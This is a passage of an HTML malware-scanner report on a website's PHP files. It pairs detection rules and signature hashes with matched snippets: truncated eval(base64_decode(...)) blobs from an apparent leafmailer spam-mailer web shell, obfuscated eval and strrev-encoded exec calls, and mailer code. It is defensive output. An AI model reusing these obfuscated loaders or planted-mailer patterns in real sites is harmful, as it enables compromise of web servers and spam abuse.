<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_97").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/qqacr.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:58:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:58:21</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_98" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_98").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/zvywl.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:28</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_99" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
